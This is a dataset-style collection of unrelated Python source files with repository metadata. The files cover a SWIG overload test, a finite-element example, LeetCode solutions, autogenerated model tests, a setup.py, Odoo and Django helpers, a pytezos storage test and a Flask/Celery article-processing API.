| 2021-01-16T16:16:05.282278
| 2020-05-19T08:00:33
| 2020-05-19T08:00:33
| 243,180,319
| 1
| 0
|
Apache-2.0
| 2020-02-26T05:54:51
| 2020-02-26T05:54:50
| null |
UTF-8
|
Python
| false
| false
| 3,596
|
py
|
from overload_template import *
f = foo()
a = maximum(3, 4)
b = maximum(3.4, 5.2)
# mix 1
if (mix1("hi") != 101):
raise RuntimeError, ("mix1(const char*)")
if (mix1(1.0, 1.0) != 102):
raise RuntimeError, ("mix1(double, const double &)")
if (mix1(1.0) != 103):
raise RuntimeError, ("mix1(double)")
# mix 2
if (mix2("hi") != 101):
raise RuntimeError, ("mix2(const char*)")
if (mix2(1.0, 1.0) != 102):
raise RuntimeError, ("mix2(double, const double &)")
if (mix2(1.0) != 103):
raise RuntimeError, ("mix2(double)")
# mix 3
if (mix3("hi") != 101):
raise RuntimeError, ("mix3(const char*)")
if (mix3(1.0, 1.0) != 102):
raise RuntimeError, ("mix3(double, const double &)")
if (mix3(1.0) != 103):
raise RuntimeError, ("mix3(double)")
# Combination 1
if (overtparams1(100) != 10):
raise RuntimeError, ("overtparams1(int)")
if (overtparams1(100.0, 100) != 20):
raise RuntimeError, ("overtparams1(double, int)")
# Combination 2
if (overtparams2(100.0, 100) != 40):
raise RuntimeError, ("overtparams2(double, int)")
# Combination 3
if (overloaded() != 60):
raise RuntimeError, ("overloaded()")
if (overloaded(100.0, 100) != 70):
raise RuntimeError, ("overloaded(double, int)")
# Combination 4
if (overloadedagain("hello") != 80):
raise RuntimeError, ("overloadedagain(const char *)")
if (overloadedagain() != 90):
raise RuntimeError, ("overloadedagain(double)")
# specializations
if (specialization(10) != 202):
raise RuntimeError, ("specialization(int)")
if (specialization(10.0) != 203):
raise RuntimeError, ("specialization(double)")
if (specialization(10, 10) != 204):
raise RuntimeError, ("specialization(int, int)")
if (specialization(10.0, 10.0) != 205):
raise RuntimeError, ("specialization(double, double)")
if (specialization("hi", "hi") != 201):
raise RuntimeError, ("specialization(const char *, const char *)")
# simple specialization
xyz()
xyz_int()
xyz_double()
# a bit of everything
if (overload("hi") != 0):
raise RuntimeError, ("overload()")
if (overload(1) != 10):
raise RuntimeError, ("overload(int t)")
if (overload(1, 1) != 20):
raise RuntimeError, ("overload(int t, const int &)")
if (overload(1, "hello") != 30):
raise RuntimeError, ("overload(int t, const char *)")
k = Klass()
if (overload(k) != 10):
raise RuntimeError, ("overload(Klass t)")
if (overload(k, k) != 20):
raise RuntimeError, ("overload(Klass t, const Klass &)")
if (overload(k, "hello") != 30):
raise RuntimeError, ("overload(Klass t, const char *)")
if (overload(10.0, "hi") != 40):
raise RuntimeError, ("overload(double t, const char *)")
if (overload() != 50):
raise RuntimeError, ("overload(const char *)")
# everything put in a namespace
if (nsoverload("hi") != 1000):
raise RuntimeError, ("nsoverload()")
if (nsoverload(1) != 1010):
raise RuntimeError, ("nsoverload(int t)")
if (nsoverload(1, 1) != 1020):
raise RuntimeError, ("nsoverload(int t, const int &)")
if (nsoverload(1, "hello") != 1030):
raise RuntimeError, ("nsoverload(int t, const char *)")
if (nsoverload(k) != 1010):
raise RuntimeError, ("nsoverload(Klass t)")
if (nsoverload(k, k) != 1020):
raise RuntimeError, ("nsoverload(Klass t, const Klass &)")
if (nsoverload(k, "hello") != 1030):
raise RuntimeError, ("nsoverload(Klass t, const char *)")
if (nsoverload(10.0, "hi") != 1040):
raise RuntimeError, ("nsoverload(double t, const char *)")
if (nsoverload() != 1050):
raise RuntimeError, ("nsoverload(const char *)")
A_foo(1)
b = B()
b.foo(1)
|
[
"inishchith@gmail.com"
] |
inishchith@gmail.com
|
ff962c602c1f68d63c7883569742a8670659f422
|
e6b45b6cc01a921c3cc510f1a5fff3074dd6b2dd
|
/example_update1/PoissonFEMWithRobinBC_example.py
|
3ff8c61a39419d78d70757f91ba1ecd69df871af
|
[] |
no_license
|
yoczhang/FEALPyExamples
|
3bd339bd5f4576630f767a758da9590a1c068410
|
44d9acbecb528374bc67bba50c62711384228d39
|
refs/heads/master
| 2023-07-24T21:35:50.633572
| 2023-07-05T02:28:13
| 2023-07-05T02:28:13
| 208,667,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
#!/usr/bin/env python3
#
import sys
import numpy as np
from scipy.sparse.linalg import spsolve
import matplotlib.pyplot as plt
import pyamg
from fealpy.functionspace import LagrangeFiniteElementSpace
from fealpy.boundarycondition import RobinBC
from fealpy.tools.show import showmultirate
p = int(sys.argv[1])
n = int(sys.argv[2])
maxit = int(sys.argv[3])
d = int(sys.argv[4])
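# Usage sketch (illustrative invocation, matching the sys.argv reads above):
#   python PoissonFEMWithRobinBC_example.py 1 4 4 2
# i.e. degree p=1 elements, initial mesh parameter n=4, maxit=4 refinement
# steps, in d=2 dimensions.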
if d == 2:
from fealpy.pde.poisson_2d import CosCosData as PDE
elif d == 3:
from fealpy.pde.poisson_3d import CosCosCosData as PDE
pde = PDE()
mesh = pde.init_mesh(n=n)
errorType = ['$|| u - u_h||_{\Omega,0}$',
'$||\\nabla u - \\nabla u_h||_{\Omega, 0}$'
]
errorMatrix = np.zeros((2, maxit), dtype=np.float)
NDof = np.zeros(maxit, dtype=np.float)
for i in range(maxit):
space = LagrangeFiniteElementSpace(mesh, p=p)
NDof[i] = space.number_of_global_dofs()
uh = space.function()
A = space.stiff_matrix()
F = space.source_vector(pde.source)
bc = RobinBC(space, pde.robin)
A, F = bc.apply(A, F)
#uh[:] = spsolve(A, F).reshape(-1)
ml = pyamg.ruge_stuben_solver(A)
uh[:] = ml.solve(F, tol=1e-12, accel='cg').reshape(-1)
errorMatrix[0, i] = space.integralalg.error(pde.solution, uh.value)
errorMatrix[1, i] = space.integralalg.error(pde.gradient, uh.grad_value)
if i < maxit-1:
mesh.uniform_refine()
if d == 2:
fig = plt.figure()
axes = fig.gca(projection='3d')
uh.add_plot(axes, cmap='rainbow')
elif d == 3:
    print('The 3d function plot has not been implemented!')
showmultirate(plt, 0, NDof, errorMatrix, errorType, propsize=20)
plt.show()
|
[
"yoczhang@126.com"
] |
yoczhang@126.com
|
cea744c519951b1d792842fa074670506fc24208
|
760e1c14d056dd75958d367242c2a50e829ac4f0
|
/bit/338_counting_bits.py
|
81ff431da8a2934e28c5d1339ee654906a25b2a5
|
[] |
no_license
|
lawtech0902/py_imooc_algorithm
|
8e85265b716f376ff1c53d0afd550470679224fb
|
74550d68cd3fd2cfcc92e1bf6579ac3b8f31aa75
|
refs/heads/master
| 2021-04-26T22:54:42.176596
| 2018-09-23T15:45:22
| 2018-09-23T15:45:22
| 123,894,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
# _*_ coding: utf-8 _*_
"""
__author__ = 'lawtech'
__date__ = '2018/9/3 4:25 PM'
Given a non-negative integer num, for every number i in the range 0 <= i <= num,
compute the number of 1s in the binary representation of i and return them as
an array.
Example 1:
Input: 2
Output: [0,1,1]
Example 2:
Input: 5
Output: [0,1,1,2,1,2]
Follow-up:
It is very easy to give a solution with time complexity O(n*sizeof(integer)).
But can you do it in linear time O(n) with a single pass? The algorithm should
use O(n) space.
Can you improve the solution further? Do it without using any built-in function
(such as __builtin_popcount in C++) in any language.
Consider the pattern of binary numbers: [000,001,010,011,100,101,110,111]
correspond to [0,1,2,3,4,5,6,7]. These show that the binary numbers 4-7 are
just 0-3 with the highest bit flipped from 0 to 1; that is, each new
power-of-two block repeats all earlier binary numbers with one extra leading 1.
"""
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
res = [0]
for i in range(1, num + 1):
res.append(res[i & (i - 1)] + 1)
return res
if __name__ == '__main__':
print(Solution().countBits(5))
|
[
"584563542@qq.com"
] |
584563542@qq.com
|
dc12825f1785f0eceb733db879c05efe907c1ac8
|
e912af291e1457c61606642f1c7700e678c77a27
|
/python/532_k-diff_pairs_in_an_array.py
|
b3078a0372260afbe3f7744d4defba6a128add92
|
[] |
no_license
|
MakrisHuang/LeetCode
|
325be680f8f67b0f34527914c6bd0a5a9e62e9c9
|
7609fbd164e3dbedc11308fdc24b57b5097ade81
|
refs/heads/master
| 2022-08-13T12:13:35.003830
| 2022-07-31T23:03:03
| 2022-07-31T23:03:03
| 128,767,837
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
import collections
from typing import List


class Solution:
    def findPairs(self, nums: List[int], k: int) -> int:
        if k > 0:
            # A k-diff pair exists for value n exactly when n + k is also present.
            return len(set(nums) & set(n + k for n in nums))
        elif k == 0:
            # For k == 0, count the values that appear at least twice.
            return sum(v > 1 for v in collections.Counter(nums).values())
        else:
            # An absolute difference can never be negative.
            return 0
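# Worked example (illustrative): nums = [3, 1, 4, 1, 5], k = 2 ->
# set(nums) = {1, 3, 4, 5}, {n + 2} = {3, 5, 6, 7}; intersection {3, 5}
# gives 2 unique pairs: (1, 3) and (3, 5).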
|
[
"vallwesture@gmail.com"
] |
vallwesture@gmail.com
|
3b7afc565fc2ff0482cafb249736d156f6f05efc
|
59166105545cdd87626d15bf42e60a9ee1ef2413
|
/test/test_ice_hockey_league.py
|
c6490a78cce2303eb5bfa685c644b362d39686a4
|
[] |
no_license
|
mosoriob/dbpedia_api_client
|
8c594fc115ce75235315e890d55fbf6bd555fa85
|
8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc
|
refs/heads/master
| 2022-11-20T01:42:33.481024
| 2020-05-12T23:22:54
| 2020-05-12T23:22:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,309
|
py
|
# coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import dbpedia
from dbpedia.models.ice_hockey_league import IceHockeyLeague # noqa: E501
from dbpedia.rest import ApiException
class TestIceHockeyLeague(unittest.TestCase):
"""IceHockeyLeague unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IceHockeyLeague
        include_optional is a boolean: when False only required
        params are included, when True both required and
        optional params are included """
# model = dbpedia.models.ice_hockey_league.IceHockeyLeague() # noqa: E501
if include_optional :
return IceHockeyLeague(
viaf_id = [
'0'
],
leader_function = [
None
],
art_patron = [
None
],
manager_season = [
None
],
secretary_general = [
None
],
number_of_locations = [
56
],
discipline = [
None
],
type = [
'0'
],
revenue = [
1.337
],
affiliation = [
None
],
season = [
None
],
id = '0',
nla_id = [
'0'
],
chairperson = [
None
],
region_served = [
None
],
superintendent = [
None
],
formation_date = [
'0'
],
number_of_employees = [
56
],
extinction_date = [
'0'
],
player_season = [
None
],
endowment = [
1.337
],
number_of_teams = [
56
],
slogan = [
'0'
],
regional_council = [
None
],
location_city = [
None
],
number_of_volunteers = [
56
],
ideology = [
None
],
description = [
'0'
],
membership = [
'0'
],
ceo = [
None
],
formation_year = [
'0'
],
junior_season = [
None
],
headquarter = [
None
],
extinction_year = [
'0'
],
child_organisation = [
None
],
honours = [
None
],
parent_organisation = [
None
],
organisation_member = [
None
],
number_of_staff = [
56
],
product = [
None
],
hometown = [
None
],
foundation_place = [
None
],
national_selection = [
None
],
current_season = [
'0'
],
label = [
'0'
],
legal_form = [
None
],
general_council = [
None
],
trustee = [
None
],
age = [
56
],
main_organ = [
None
]
)
else :
return IceHockeyLeague(
)
def testIceHockeyLeague(self):
"""Test IceHockeyLeague"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"maxiosorio@gmail.com"
] |
maxiosorio@gmail.com
|
ccd797d9bd113bf5dbade1cb215f77a6a5b3b320
|
9d40c348e256bd74455521a7a11d8a4ab5d0d9f0
|
/setup.py
|
b88fc0a1a902044454101d52320b623ab903dd99
|
[] |
no_license
|
tianon/etest
|
acf5bd2f06cf9a5024353cfc8128c3e968b889c2
|
01f24e46caaa3c75c48c43e59a8c03da81e06e3b
|
refs/heads/master
| 2021-01-17T20:11:43.244552
| 2015-05-03T15:10:06
| 2015-05-03T15:10:33
| 36,564,139
| 0
| 0
| null | 2015-05-30T15:38:31
| 2015-05-30T15:38:31
| null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
# Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
import os
from setuptools import setup, find_packages
from codecs import open
with open(os.path.join('etest', 'information.py'), 'r', encoding = 'utf-8') as fh:
exec(fh.read(), globals(), locals())
PARAMS = {}
PARAMS['name'] = NAME  # flake8: noqa (provided by the exec above)
PARAMS['version'] = VERSION  # flake8: noqa (provided by the exec above)
PARAMS['description'] = DESCRIPTION  # flake8: noqa (provided by the exec above)
with open('README.rst', 'r', encoding = 'utf-8') as fh:
PARAMS['long_description'] = fh.read()
PARAMS['url'] = URL  # flake8: noqa (provided by the exec above)
PARAMS['author'] = AUTHOR  # flake8: noqa (provided by the exec above)
PARAMS['author_email'] = AUTHOR_EMAIL  # flake8: noqa (provided by the exec above)
PARAMS['license'] = LICENSE  # flake8: noqa (provided by the exec above)
PARAMS['classifiers'] = [
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
'Topic :: Utilities',
]
PARAMS['keywords'] = [
'ebuild',
'test',
'gentoo',
'portage',
'emerge',
]
PARAMS['packages'] = find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
PARAMS['package_data'] = {
'etest.parsers': [ 'bash.p' ],
}
PARAMS['install_requires'] = [
'click',
'docker-py',
'ply',
]
PARAMS['test_suite'] = 'nose.collector'
PARAMS['tests_require'] = [
    'coverage',
    'nose',
]
PARAMS['entry_points'] = {
'console_scripts': [
'etest = etest:etest',
],
}
PARAMS['data_files'] = [
('share/doc/{P[name]}-{P[version]}'.format(P = PARAMS), [
'README.rst',
]),
]
setup(**PARAMS)
|
[
"alunduil@alunduil.com"
] |
alunduil@alunduil.com
|
449664c6a652f208251835430b04392c9f31857d
|
457d07994582657539a52d2fe8b7c24557ecc1fb
|
/service10/migrations/0003_auto_20190201_0630.py
|
0bcec6dd58bbb0c6baf0b78d282f64a82370ca3c
|
[] |
no_license
|
ohsehwan/django_admin_nanum
|
952c91452697f1ee7718449ceceaf4e434c3da27
|
0478389d3a44592fd2ee6f025f2b4a66c1a2176e
|
refs/heads/master
| 2022-12-23T01:18:58.124355
| 2019-06-21T07:42:49
| 2019-06-21T07:42:49
| 168,487,820
| 3
| 1
| null | 2022-12-08T01:02:50
| 2019-01-31T08:11:59
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 597
|
py
|
# Generated by Django 2.1.5 on 2019-02-01 06:30
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('service10', '0002_mentor'),
]
operations = [
migrations.CreateModel(
name='article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('html', ckeditor.fields.RichTextField()),
],
),
migrations.DeleteModel(
name='mentor',
),
]
|
[
"dxman@naver.com"
] |
dxman@naver.com
|
55f57819c1d4758954960879bf878e26885de0ae
|
e992b76761d2cc95e55d8c21f78f9636b0f74aae
|
/caches/__init__.py
|
1611d10b35c4da8ec7150bb0321420534a499a69
|
[
"MIT"
] |
permissive
|
Jaymon/caches
|
7d61bed61ef8d3dc8a328ee037c14a4fc994e98f
|
3e2aa5fcf51e8de80bea46eb117b73fb1f398e53
|
refs/heads/master
| 2023-07-20T23:13:55.461196
| 2023-07-12T20:33:49
| 2023-07-12T20:33:49
| 12,884,773
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import logging
from caches.compat import *
from caches.core import (
Cache,
DictCache,
SetCache,
SortedSetCache,
SentinelCache,
)
from .interface import get_interfaces, get_interface, set_interface
from .dsn import configure, configure_environ
from .decorators import cached
__version__ = '3.0.0'
logger = logging.getLogger(__name__)
def unsafe_clear(pattern):
"""Clear the keys matching pattern
    This uses SCAN to find keys matching pattern (e.g., foo*) and deletes them
    one at a time.
https://github.com/redis/redis/issues/2042
https://stackoverflow.com/a/4006575/5006
:param pattern: str, something like foo* or *bar*
:returns: int, how many keys were deleted
"""
count = 0
for connection_name, inter in get_interfaces().items():
# https://redis.io/commands/scan
# https://stackoverflow.com/a/34166690/5006
for key in inter.scan_iter(match=pattern, count=500):
inter.delete(String(key))
count += 1
return count
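# Usage sketch (hypothetical key pattern): unsafe_clear('session:*') scans
# every configured interface, deletes each matching key, and returns the
# number of keys removed.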
configure_environ()
|
[
"jay@marcyes.com"
] |
jay@marcyes.com
|
5edeb038cd1f87c8aac071184fd2fef2036abf0b
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/cs61a/untarred backup/122.py
|
887a81dc01674a92d8b5e6f55aff075abf43e9b7
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
goal_letters = get_list(goal_word)
guess_letters = get_list(guess)
common = 0
for guess_letter in guess_letters:
if guess_letter in goal_letters:
common += 1
goal_letters = [letter for letter in goal_letters if letter != guess_letter]
return common
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
cea269f71a06be2e88bab6c122be7e5ec8d08c22
|
8a6c1d9ff5f469774ca4651d46f212474b3435bf
|
/base/base_driver.py
|
8d5ef05be8b058f89c05bfb1479b57f4c18c3888
|
[] |
no_license
|
yuanyue888666/test_jinkens_001
|
67a68378dc518e3033a4563f0530adeb530a8646
|
b553d0348d967cdb6e25c7d1a46746b75f6d9512
|
refs/heads/master
| 2020-04-27T15:46:15.202764
| 2019-03-08T03:42:47
| 2019-03-08T03:42:47
| 174,459,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
from appium import webdriver
def init_driver():
"""
只要调用,就可以打开对应的应用程序
:return:
"""
# server 启动参数
desired_caps = {}
# 设备信息
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = '192.168.56.101:5555'
# app的信息
desired_caps['appPackage'] = 'com.android.contacts'
desired_caps['appActivity'] = '.activities.PeopleActivity'
# 不要重置应用
desired_caps['noReset'] = True
# 声明我们的driver对象
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
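# Usage sketch (assumes an Appium server listening on 127.0.0.1:4723 and the
# emulator configured above): driver = init_driver(); ...; driver.quit()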
|
[
"johndoe@example.com"
] |
johndoe@example.com
|
9808dd7f6cb3c4f34d801fa34e4fda3e2717b5d7
|
a15b050e661c31880acc72465421f3ba4906ef06
|
/0x06-python-classes/101-square.py
|
ffd6008dce8087b7476ce7b4b8aa8ac3e838cdf3
|
[] |
no_license
|
zacwoll/holbertonschool-higher_level_programming
|
0c483195f50a55fe0bfae5cff03c0c86719d8063
|
9c7dda67dc5681fd96b90d6f05ee9748a37ed8b8
|
refs/heads/master
| 2022-12-22T04:54:13.815410
| 2020-09-25T16:03:41
| 2020-09-25T16:03:41
| 259,412,215
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,844
|
py
|
#!/usr/bin/python3
"""Represent a Square Object with a __repr__ toString"""
class Square:
"""A Square"""
def __init__(self, size=0, position=(0, 0)):
"""Init"""
self.__size = size
self.__position = position
def __repr__(self):
"""Square toString"""
to_str = ''
if self.__size == 0:
to_str += '\n'
else:
to_str += ('\n' * self.__position[1])
for i in range(self.__size):
to_str += (' ' * self.__position[0])
to_str += ('#' * self.__size + '\n')
return to_str[:-1]
@property
def size(self):
"""gets the value of size"""
return self.__size
@size.setter
def size(self, value):
"""sets the value of size"""
if type(value) != int:
raise TypeError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Area of Square"""
return self.__size ** 2
@property
def position(self):
"""gets the value of position"""
return self.__position
@position.setter
def position(self, value):
"""Sets the value of position"""
        if type(value) != tuple or len(value) != 2 or \
                not all(type(x) == int and x >= 0 for x in value):
            raise TypeError('position must be a tuple of 2 positive integers')
self.__position = value
def my_print(self):
"""Print the square."""
if self.__size == 0:
print()
else:
print('\n' * self.__position[1], end='')
for i in range(self.__size):
print(' ' * self.__position[0], end='')
print('#' * self.__size)
|
[
"zacwoll@gmail.com"
] |
zacwoll@gmail.com
|
4c19051a43c291779e8c00d44bd6b787249af569
|
20b2d61c0959023cb51be92fafe54877aecb9887
|
/pabi_utils/models/ir_attachment.py
|
574f5bb0a1d036cefea059529c50c697e945ffb3
|
[] |
no_license
|
BTCTON/pb2_addons
|
6841a23554054f859b0c4acafb4e91bd0c3a14e4
|
a5bfd90c202cea894690c96d74a74fa96eb79468
|
refs/heads/master
| 2021-09-07T16:55:41.195667
| 2018-02-26T11:27:01
| 2018-02-26T11:27:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,864
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
from openerp import models, fields, api
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
_inherit = 'ir.attachment'
@api.model
def name_search(self, name, args=None, operator='ilike', limit=80):
if self._context.get('domain_template_ids', False):
args += [('id', 'in', self._context['domain_template_ids'][0][2])]
return super(IrAttachment, self).name_search(name=name, args=args,
operator=operator,
limit=limit)
# @api.model
# def load_xlsx_template(self, addon, template_ids, file_dir):
# print addon
# print template_ids
# print file_dir
# for xml_id in template_ids:
# try:
# xmlid = '%s.%s' % (addon, xml_id)
# att = self.env.ref(xmlid)
# file_path = '%s/%s' % (file_dir, att.datas_fname)
# att.datas = open(file_path, 'rb').read().encode('base64')
# except ValueError, e:
# _logger.exception(e.message)
@api.model
def load_xlsx_template(self, att_ids, folder):
for att in self.browse(att_ids):
try:
file_dir = os.path.dirname(os.path.realpath(__file__))
                # While we can't find a better solution, we get the addon dir
                # this way; so make sure that the calling addon is in the same
                # folder as this pabi_utils
file_dir = file_dir.replace('/pabi_utils/models', '')
file_path = '%s/%s/%s' % (file_dir, folder, att.datas_fname)
att.datas = open(file_path, 'rb').read().encode('base64')
except ValueError, e:
_logger.exception(e.message)
|
[
"kittiu@gmail.com"
] |
kittiu@gmail.com
|
485e5433667081aaf4dc508002d827c07367437d
|
6bc485e593a24354e8ec6ad1284809c5748b7995
|
/workon/contrib/admin2/templatetags/workon_admin_forms.py
|
5e50c0aa768171d3c1ca93e280ff13d4969dbcbe
|
[
"BSD-3-Clause"
] |
permissive
|
dalou/django-workon
|
fba87b6951540d7f059c8fcb79cd556573f56907
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
refs/heads/master
| 2021-01-20T11:09:49.314839
| 2018-12-29T16:56:08
| 2018-12-29T16:56:08
| 50,340,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
from django import template
from ..config import get_config
register = template.Library()
def get_form_size(fieldset):
default_label_class = get_config('form_size').split(':')
# Try fieldset definition at first
size_by_fieldset = get_fieldset_size(fieldset)
if size_by_fieldset:
return size_by_fieldset
# Fallback to model admin definition
ma_sizes = getattr(fieldset.model_admin, 'workon_admin_form_size', None)
if ma_sizes:
return ma_sizes.split(':')
# Use default values at last
return default_label_class
def get_fieldset_size(fieldset):
if fieldset and fieldset.classes and ':' in fieldset.classes:
for cls in fieldset.classes.split(' '):
if ':' in cls:
return cls.split(':')
@register.filter
def workon_admin_form_label_class(field, fieldset):
default_class = get_form_size(fieldset)[0]
if not hasattr(field, 'field'):
return default_class
label_class = field.field.widget.attrs.get('label_class')
if label_class:
return label_class
return default_class
@register.filter
def workon_admin_form_field_class(field, fieldset):
"""
Return classes for form-column
"""
css_classes = []
default_class = get_form_size(fieldset)[1]
css_classes.append('form-column')
if not hasattr(field.field, 'field'):
css_classes.append(default_class)
return ' '.join(css_classes)
widget_py_cls = field.field.field.widget.__class__.__name__
css_classes.append('widget-%s' % widget_py_cls)
if 'RawIdWidget' in widget_py_cls:
css_classes.append('form-inline')
class_by_widget = field.field.field.widget.attrs.get('column_class')
if class_by_widget:
del field.field.field.widget.attrs['column_class']
css_classes.append(class_by_widget)
else:
css_classes.append(default_class)
return ' '.join(css_classes)
|
[
"autrusseau.damien@gmail.com"
] |
autrusseau.damien@gmail.com
|
e7fe710c9c2d6ebda3fbd6abeb440116a6fe2d4b
|
90c6262664d013d47e9a3a9194aa7a366d1cabc4
|
/tests/storage/cases/test_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.py
|
4057d7a5c0281d83115c8389161a41dd451ce6df
|
[
"MIT"
] |
permissive
|
tqtezos/pytezos
|
3942fdab7aa7851e9ea81350fa360180229ec082
|
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
|
refs/heads/master
| 2021-07-10T12:24:24.069256
| 2020-04-04T12:46:24
| 2020-04-04T12:46:24
| 227,664,211
| 1
| 0
|
MIT
| 2020-12-30T16:44:56
| 2019-12-12T17:47:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.json')
def test_storage_encoding_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
[
"mz@baking-bad.org"
] |
mz@baking-bad.org
|
6f50d5f2a0f722718cb1480dd3c12c423f57a9ac
|
5f13ce6fb06d86f99ddcc0d8aa16cc4817ec4b03
|
/api.py
|
9c029c70498dce7666c1bcb59689c55d50bada12
|
[] |
no_license
|
news-ai/news-processing
|
1b59f17c24da9f48d35c09db64c98fca18471bb6
|
1b874e186f8b9d8510dd3b47a672a7c08f98e082
|
refs/heads/master
| 2021-03-19T16:42:57.783382
| 2016-06-11T18:26:31
| 2016-06-11T18:26:31
| 58,774,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,493
|
py
|
# Stdlib imports
import logging
# Third-party app imports
from flask import Flask, request, jsonify
from flask.ext.cors import CORS
from flask_restful import Resource, Api, reqparse
from raven.contrib.flask import Sentry
# Imports from app
from middleware.config import (
SENTRY_USER,
SENTRY_PASSWORD,
SENTRY_APP_ID,
)
from processing.process_article import process_article
from taskrunner import app as celery_app
# Setting up Flask and API
app = Flask(__name__)
api = Api(app)
CORS(app)
# Setting up Sentry
sentry = Sentry(
app, dsn='https://' + SENTRY_USER + ':' + SENTRY_PASSWORD + '@app.getsentry.com/' + SENTRY_APP_ID)
logger = logging.getLogger("sentry.errors")
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(levelname)s] %(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# Setting up parser
parser = reqparse.RequestParser()
parser.add_argument('url')
parser.add_argument('added_by')
parser.add_argument('rss_id')
# Route to POST data for news processing
class Processing(Resource):
def post(self):
args = parser.parse_args()
if 'added_by' in args and args['added_by'] is not None:
return process_article(args)
res = celery_app.send_task(
'processing.process_article.process_article', ([args]))
return jsonify({'id': res.task_id})
api.add_resource(Processing, '/processing')
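# Usage sketch (illustrative request): POSTing form data such as
#   curl -X POST http://localhost:8000/processing -d "url=https://example.com/article"
# enqueues the article for processing and returns {"id": "<celery-task-id>"}.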
if __name__ == '__main__':
app.run(port=int('8000'), debug=False)
|
[
"me@abhiagarwal.com"
] |
